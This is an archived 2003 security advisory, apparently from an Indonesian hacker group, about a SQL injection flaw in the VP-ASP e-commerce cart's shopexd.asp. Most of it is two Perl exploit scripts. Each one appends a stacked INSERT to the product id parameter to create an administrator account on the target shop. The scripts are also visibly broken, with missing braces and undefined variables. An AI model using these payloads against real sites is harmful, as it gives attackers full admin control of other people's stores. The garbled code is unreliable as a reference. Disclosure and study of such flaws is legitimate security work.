Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Web :: Apps :: bt534.txt

VPASP SQL Injection Vulnerability & Exploit CODE CGI:

Advisory Name: VPASP SQL Injection Vulnerability & Exploit CODE
Release Date: 05/07/2003
Application: 5
Platform: Win32/MSSQL
Severity: High
BUG Type: SQL Injection
Discover by: AresU <> & TioEuy <>
Author: Bosen <>
Vendor Status: See below.
Vendor URL:

VP-ASP is  now in use in over 70 countries and has every major feature
you would expect from an e-commerce solution. VP-ASP combines  ease of use
and powerful features with unlimited customization.
more nice reading at itself.

Looking at vpasp source code, we found nice SQL Injection vuln. which is
lies on shopexd.asp. Exploiting is not hard to do. Insert new user with
admin priviledge can be done in a sec. Which is would couse full control to
web based admin interface.

by Bosen
#!/usr/bin/perl -w
$pamer = "
1ndonesian Security Team (1st)
==============================, vpasp SQL Injection Proof of Concept
Exploit by  : Bosen & TioEuy
Discover by : TioEuy, AresU
Greetz to   : AresU, syzwz (ta for da ipod), TioEuy, sakitjiwa,
muthafuka all #hackers\
"; # shut up ! we're the best in our country :)

use LWP::UserAgent;  # LWP Mode sorry im lazy :)
use HTTP::Request;
use HTTP::Response;
$| = 1;
print $pamer;
if ($#ARGV<3){
  print "\n Usage: perl <uri> <prod-id> <user> <password>
my $biji    =
$tio     = "$ARGV[0]/shopexd.asp?id=$ARGV[1]";
$tio    .= ";insert into tbluser
(\"fldusername\",\"fldpassword\",\"fldaccess\") ";
$tio    .= "values ('$ARGV[2]','$ARGV[3]','$biji')--";

my $bosen  = LWP::UserAgent->new();
my $gembel = HTTP::Request->new(GET => $tio);
my $dodol  = $bosen->request($gembel);
if ($dodol->is_error()) {
   printf " %s\n", $dodol->status_line;
} else {
   print "Tuing !\n";
print "\n680165\n";

by Aresu
# 1ndonesian Security Team (1st)
# ==============================
# VP-ASP Shopping Cart - Exploit
# Discover by : TioEuy & AresU;
# Greetz to: syzwz (ta for da ipod), Bosen, sakitjiwa, muthafuka all
use Socket;

$dodolbasik = ", VPASP exploit by TioEuy&AresU ";
$pieldnya = '"fldusername","fldpassword","fldaccess"';

if ($#ARGV<4)
  print "\n$dodolbasik";
  print "\n\n Usage: perl <server> <full path> <id> <user>
<password> \n\n";
$kupret="$ARGV[1]shopexd.asp?id=$ARGV[2];insert into tbluser
values ('$ARGV[3]','$ARGV[4]','$aksesnya')--";
$kupret=~s/\ /%20/g;
$kupret="GET $kupret HTTP/1.0\r\nHost: $ARGV[0]\r\n\r\n";
print $kupret;

$target = inet_aton($host);
print $gembel;
print @hasil;

# ------------- Sendraw - thanx RFP
sub sendraw {   # this saves the whole transaction anyway
        my ($pstr)=@_;

        socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
                die("Socket problems\n");

        if(connect(S,pack "SnA4x8",2,$port,$target)){
                my @in;
                select(S);      $|=1;   print $pstr;
                while(<S>){ push @in, $_;}
                select(STDOUT); close(S); return @in;

Vendor Response:
Contacted. No response.

No recommendation for this.

1ndonesian Security Team (1st) Advisory:

About 1ndonesian Security Team:
1ndonesian Security Team, research and develop intelligent, advanced
application security assessment. Based in Indonesia, 1ndonesian Security
Team offers best of breed security consulting services, specialising in
application, host and network security assessments.

1st provides security information and patches for use by the entire 1st

This information is provided freely to all interested parties and may be
redistributed provided that it is not altered in any way, 1st is
credited and the document retains.

Greetz to:
Bosen, sakitjiwa, muthafuka, alphacentury, Gembul, syzwz, Heltz, TomIngShUu,
riico, w4n, negative
All 1ndonesian Security Team -

AresU <>
Original document can be fount at

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH